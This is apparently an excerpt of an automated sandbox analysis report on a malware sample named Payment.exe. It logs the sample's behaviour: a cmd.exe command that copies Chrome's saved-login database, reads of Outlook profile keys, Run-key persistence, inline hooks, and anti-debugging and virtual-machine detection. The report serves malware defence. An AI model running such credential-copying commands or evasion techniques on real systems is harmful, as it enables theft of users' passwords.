      Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /VJump to behavior
      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32Jump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeFile written: C:\Users\user\AppData\Roaming\0M0Q5-6-\0M0logri.iniJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
      Source: Payment.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
      Source: Payment.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
      Source: Payment.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
      Source: Payment.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Payment.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
      Source: Payment.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
      Source: Payment.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Source: Payment.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.982549303.0000000007010000.00000002.00000001.sdmp
      Source: Binary string: netsh.pdb source: Payment.exe, 00000000.00000003.1004774628.00000000005F2000.00000004.00000001.sdmp
      Source: Binary string: netsh.pdbGCTL source: Payment.exe, 00000000.00000003.1004774628.00000000005F2000.00000004.00000001.sdmp
      Source: Binary string: wntdll.pdbUGP source: Payment.exe, 00000000.00000002.1009402390.0000000003D4F000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: Payment.exe
      Source: Binary string: C:\Codes\Version11\CHECKER_1\Release\CHECKER_1.pdb source: Payment.exe
      Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.982549303.0000000007010000.00000002.00000001.sdmp
      Source: Payment.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
      Source: Payment.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
      Source: Payment.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
      Source: Payment.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
      Source: Payment.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_003F6F42 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_003F6F42
      Source: Payment.exeStatic PE information: section name:
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_003F3A35 push ecx; ret 0_2_003F3A48
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03CADE2D push ecx; ret 0_2_03CADE40

      Source: C:\Windows\SysWOW64\netsh.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run VPZLD8LXUBJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run VPZLD8LXUBJump to behavior

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Modifies the prolog of user mode functions (user mode inline hooks)Show sources
      Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8E 0xE3 0x34
      Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion:

      barindex
      Tries to detect virtualization through RDTSC time measurementsShow sources
      Source: C:\Users\user\Desktop\Payment.exeRDTSC instruction interceptor: First address: 0000000003873D1C second address: 0000000003873D22 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\Payment.exeRDTSC instruction interceptor: First address: 0000000003873F86 second address: 0000000003873F8C instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: 0000000000537244 second address: 000000000053724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: 00000000005374AE second address: 00000000005374B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C87B60 rdtsc 0_2_03C87B60
      Source: C:\Users\user\Desktop\Payment.exeAPI coverage: 6.8 %
      Source: C:\Windows\explorer.exe TID: 4408Thread sleep time: -34000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exe TID: 1044Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: explorer.exe, 00000003.00000000.983228121.0000000007340000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: explorer.exe, 00000003.00000000.983228121.0000000007340000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: explorer.exe, 00000003.00000000.983228121.0000000007340000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: explorer.exe, 00000003.00000000.983228121.0000000007340000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
      Source: C:\Users\user\Desktop\Payment.exeAPI call chain: ExitProcess graph end nodegraph_0-28961
      Source: C:\Users\user\Desktop\Payment.exeProcess information queried: ProcessInformationJump to behavior

      Source: C:\Users\user\Desktop\Payment.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C87B60 rdtsc 0_2_03C87B60
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C9A3E0 NtFreeVirtualMemory,LdrInitializeThunk,0_2_03C9A3E0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_003F5C6B _memset,IsDebuggerPresent,0_2_003F5C6B
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_003F6F42 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_003F6F42
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_003F6F42 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_003F6F42
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D113D8 mov eax, dword ptr fs:[00000030h]0_2_03D113D8
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C863C2 mov ecx, dword ptr fs:[00000030h]0_2_03C863C2
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C863C2 mov ecx, dword ptr fs:[00000030h]0_2_03C863C2
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C863C2 mov eax, dword ptr fs:[00000030h]0_2_03C863C2
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C863C2 mov ecx, dword ptr fs:[00000030h]0_2_03C863C2
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C863C2 mov ecx, dword ptr fs:[00000030h]0_2_03C863C2
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C863C2 mov eax, dword ptr fs:[00000030h]0_2_03C863C2
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C863C2 mov ecx, dword ptr fs:[00000030h]0_2_03C863C2
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C863C2 mov ecx, dword ptr fs:[00000030h]0_2_03C863C2
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C863C2 mov eax, dword ptr fs:[00000030h]0_2_03C863C2
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C863C2 mov ecx, dword ptr fs:[00000030h]0_2_03C863C2
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C863C2 mov ecx, dword ptr fs:[00000030h]0_2_03C863C2
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C863C2 mov eax, dword ptr fs:[00000030h]0_2_03C863C2
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C99BC7 mov eax, dword ptr fs:[00000030h]0_2_03C99BC7
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03CE3BD8 mov eax, dword ptr fs:[00000030h]0_2_03CE3BD8
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C8ABFE mov eax, dword ptr fs:[00000030h]0_2_03C8ABFE
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C8ABFE mov eax, dword ptr fs:[00000030h]0_2_03C8ABFE
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C96399 mov eax, dword ptr fs:[00000030h]0_2_03C96399
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C96399 mov eax, dword ptr fs:[00000030h]0_2_03C96399
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C96399 mov eax, dword ptr fs:[00000030h]0_2_03C96399
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D19B89 mov eax, dword ptr fs:[00000030h]0_2_03D19B89
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D19B89 mov ecx, dword ptr fs:[00000030h]0_2_03D19B89
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C84B96 mov eax, dword ptr fs:[00000030h]0_2_03C84B96
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C84B96 mov eax, dword ptr fs:[00000030h]0_2_03C84B96
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C84B96 mov eax, dword ptr fs:[00000030h]0_2_03C84B96
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C84B96 mov eax, dword ptr fs:[00000030h]0_2_03C84B96
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C84B96 mov eax, dword ptr fs:[00000030h]0_2_03C84B96
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03CD63A6 mov eax, dword ptr fs:[00000030h]0_2_03CD63A6
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C54BB4 mov edi, dword ptr fs:[00000030h]0_2_03C54BB4
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03CD4BBE mov eax, dword ptr fs:[00000030h]0_2_03CD4BBE
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03CD4BBE mov eax, dword ptr fs:[00000030h]0_2_03CD4BBE
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03CD4BBE mov eax, dword ptr fs:[00000030h]0_2_03CD4BBE
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03CD4BBE mov eax, dword ptr fs:[00000030h]0_2_03CD4BBE
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C8BBBC mov eax, dword ptr fs:[00000030h]0_2_03C8BBBC
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D143A4 mov eax, dword ptr fs:[00000030h]0_2_03D143A4
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D143A4 mov eax, dword ptr fs:[00000030h]0_2_03D143A4
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D143A4 mov eax, dword ptr fs:[00000030h]0_2_03D143A4
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D143A4 mov eax, dword ptr fs:[00000030h]0_2_03D143A4
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D11351 mov eax, dword ptr fs:[00000030h]0_2_03D11351
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D28356 mov eax, dword ptr fs:[00000030h]0_2_03D28356
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C7FB40 mov eax, dword ptr fs:[00000030h]0_2_03C7FB40
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C7FB40 mov eax, dword ptr fs:[00000030h]0_2_03C7FB40
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C7FB40 mov eax, dword ptr fs:[00000030h]0_2_03C7FB40
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C7FB40 mov eax, dword ptr fs:[00000030h]0_2_03C7FB40
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C7FB40 mov eax, dword ptr fs:[00000030h]0_2_03C7FB40
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C7FB40 mov eax, dword ptr fs:[00000030h]0_2_03C7FB40
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C81356 mov eax, dword ptr fs:[00000030h]0_2_03C81356
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C81356 mov eax, dword ptr fs:[00000030h]0_2_03C81356
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C81356 mov eax, dword ptr fs:[00000030h]0_2_03C81356
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C81356 mov eax, dword ptr fs:[00000030h]0_2_03C81356
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C81356 mov eax, dword ptr fs:[00000030h]0_2_03C81356
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C81356 mov eax, dword ptr fs:[00000030h]0_2_03C81356
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C81356 mov eax, dword ptr fs:[00000030h]0_2_03C81356
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C9536C mov eax, dword ptr fs:[00000030h]0_2_03C9536C
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C9536C mov eax, dword ptr fs:[00000030h]0_2_03C9536C
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D1E362 mov eax, dword ptr fs:[00000030h]0_2_03D1E362
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C6E370 mov eax, dword ptr fs:[00000030h]0_2_03C6E370
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C6E370 mov eax, dword ptr fs:[00000030h]0_2_03C6E370
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C6E370 mov eax, dword ptr fs:[00000030h]0_2_03C6E370
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C8AB0C mov eax, dword ptr fs:[00000030h]0_2_03C8AB0C
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C8AB0C mov eax, dword ptr fs:[00000030h]0_2_03C8AB0C
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C5C330 mov eax, dword ptr fs:[00000030h]0_2_03C5C330
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C5C330 mov eax, dword ptr fs:[00000030h]0_2_03C5C330
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C5C330 mov eax, dword ptr fs:[00000030h]0_2_03C5C330
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C51AC0 mov eax, dword ptr fs:[00000030h]0_2_03C51AC0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C822C3 mov eax, dword ptr fs:[00000030h]0_2_03C822C3
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C822C3 mov eax, dword ptr fs:[00000030h]0_2_03C822C3
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C822C3 mov eax, dword ptr fs:[00000030h]0_2_03C822C3
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03CEB2C0 mov eax, dword ptr fs:[00000030h]0_2_03CEB2C0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03CEB2C0 mov ecx, dword ptr fs:[00000030h]0_2_03CEB2C0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03CEB2C0 mov eax, dword ptr fs:[00000030h]0_2_03CEB2C0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03CEB2C0 mov eax, dword ptr fs:[00000030h]0_2_03CEB2C0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03CEB2C0 mov eax, dword ptr fs:[00000030h]0_2_03CEB2C0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03CEB2C0 mov eax, dword ptr fs:[00000030h]0_2_03CEB2C0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D112CA mov eax, dword ptr fs:[00000030h]0_2_03D112CA
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C512F4 mov eax, dword ptr fs:[00000030h]0_2_03C512F4
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C8F289 mov eax, dword ptr fs:[00000030h]0_2_03C8F289
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C8328D mov eax, dword ptr fs:[00000030h]0_2_03C8328D
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C8328D mov eax, dword ptr fs:[00000030h]0_2_03C8328D
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C8328D mov eax, dword ptr fs:[00000030h]0_2_03C8328D
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03CD3284 mov eax, dword ptr fs:[00000030h]0_2_03CD3284
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03CD3284 mov eax, dword ptr fs:[00000030h]0_2_03CD3284
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C69AA0 mov eax, dword ptr fs:[00000030h]0_2_03C69AA0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C69AA0 mov eax, dword ptr fs:[00000030h]0_2_03C69AA0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C7B2A0 mov eax, dword ptr fs:[00000030h]0_2_03C7B2A0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C742B0 mov eax, dword ptr fs:[00000030h]0_2_03C742B0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C742B0 mov eax, dword ptr fs:[00000030h]0_2_03C742B0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C742B0 mov eax, dword ptr fs:[00000030h]0_2_03C742B0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C742B0 mov eax, dword ptr fs:[00000030h]0_2_03C742B0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C742B0 mov ecx, dword ptr fs:[00000030h]0_2_03C742B0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D11243 mov eax, dword ptr fs:[00000030h]0_2_03D11243
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C84A5B mov eax, dword ptr fs:[00000030h]0_2_03C84A5B
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C84A5B mov eax, dword ptr fs:[00000030h]0_2_03C84A5B
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D11A71 mov eax, dword ptr fs:[00000030h]0_2_03D11A71
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D20A74 mov eax, dword ptr fs:[00000030h]0_2_03D20A74
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C8EA6E mov eax, dword ptr fs:[00000030h]0_2_03C8EA6E
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C8EA6E mov eax, dword ptr fs:[00000030h]0_2_03C8EA6E
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C8EA6E mov eax, dword ptr fs:[00000030h]0_2_03C8EA6E
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C55275 mov eax, dword ptr fs:[00000030h]0_2_03C55275
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C55275 mov eax, dword ptr fs:[00000030h]0_2_03C55275
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C55275 mov eax, dword ptr fs:[00000030h]0_2_03C55275
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C55275 mov eax, dword ptr fs:[00000030h]0_2_03C55275
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C55275 mov eax, dword ptr fs:[00000030h]0_2_03C55275
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C53200 mov eax, dword ptr fs:[00000030h]0_2_03C53200
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C58209 mov eax, dword ptr fs:[00000030h]0_2_03C58209
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C58209 mov eax, dword ptr fs:[00000030h]0_2_03C58209
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C58209 mov eax, dword ptr fs:[00000030h]0_2_03C58209
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C59210 mov eax, dword ptr fs:[00000030h]0_2_03C59210
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C59210 mov eax, dword ptr fs:[00000030h]0_2_03C59210
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C59210 mov eax, dword ptr fs:[00000030h]0_2_03C59210
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C59210 mov eax, dword ptr fs:[00000030h]0_2_03C59210
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D23A05 mov eax, dword ptr fs:[00000030h]0_2_03D23A05
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D23A05 mov eax, dword ptr fs:[00000030h]0_2_03D23A05
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03CD6A16 mov eax, dword ptr fs:[00000030h]0_2_03CD6A16
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03CD6A16 mov eax, dword ptr fs:[00000030h]0_2_03CD6A16
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03CD6A16 mov eax, dword ptr fs:[00000030h]0_2_03CD6A16
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C8523D mov eax, dword ptr fs:[00000030h]0_2_03C8523D
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C8523D mov eax, dword ptr fs:[00000030h]0_2_03C8523D
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C8523D mov eax, dword ptr fs:[00000030h]0_2_03C8523D
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C8523D mov eax, dword ptr fs:[00000030h]0_2_03C8523D
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C8523D mov eax, dword ptr fs:[00000030h]0_2_03C8523D
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C8523D mov eax, dword ptr fs:[00000030h]0_2_03C8523D
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D111D2 mov eax, dword ptr fs:[00000030h]0_2_03D111D2
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C869C0 mov ecx, dword ptr fs:[00000030h]0_2_03C869C0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C551E0 mov eax, dword ptr fs:[00000030h]0_2_03C551E0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C551E0 mov ecx, dword ptr fs:[00000030h]0_2_03C551E0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C551E0 mov eax, dword ptr fs:[00000030h]0_2_03C551E0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C551E0 mov eax, dword ptr fs:[00000030h]0_2_03C551E0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C679F7 mov eax, dword ptr fs:[00000030h]0_2_03C679F7
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03CD7194 mov eax, dword ptr fs:[00000030h]0_2_03CD7194
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03CD7194 mov eax, dword ptr fs:[00000030h]0_2_03CD7194
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03CD7194 mov eax, dword ptr fs:[00000030h]0_2_03CD7194
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C5A9A6 mov eax, dword ptr fs:[00000030h]0_2_03C5A9A6
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C5A9A6 mov eax, dword ptr fs:[00000030h]0_2_03C5A9A6
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C819B0 mov eax, dword ptr fs:[00000030h]0_2_03C819B0
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03D11151 mov eax, dword ptr fs:[00000030h]0_2_03D11151
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C8594B mov eax, dword ptr fs:[00000030h]0_2_03C8594B
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C8594B mov eax, dword ptr fs:[00000030h]0_2_03C8594B
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C8594B mov eax, dword ptr fs:[00000030h]0_2_03C8594B
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C8594B mov eax, dword ptr fs:[00000030h]0_2_03C8594B
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C8594B mov eax, dword ptr fs:[00000030h]0_2_03C8594B
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C8594B mov eax, dword ptr fs:[00000030h]0_2_03C8594B
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C8594B mov eax, dword ptr fs:[00000030h]0_2_03C8594B
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C8594B mov eax, dword ptr fs:[00000030h]0_2_03C8594B
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C8594B mov eax, dword ptr fs:[00000030h]0_2_03C8594B
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C8594B mov eax, dword ptr fs:[00000030h]0_2_03C8594B
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C8594B mov eax, dword ptr fs:[00000030h]0_2_03C8594B
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C8594B mov eax, dword ptr fs:[00000030h]0_2_03C8594B
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C8594B mov eax, dword ptr fs:[00000030h]0_2_03C8594B
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C8594B mov eax, dword ptr fs:[00000030h]0_2_03C8594B
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C8594B mov eax, dword ptr fs:[00000030h]0_2_03C8594B
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C8594B mov eax, dword ptr fs:[00000030h]0_2_03C8594B
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C8594B mov eax, dword ptr fs:[00000030h]0_2_03C8594B
      Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_03C8594B mov eax, dword ptr fs:[00000030h]0_2_03C8594B
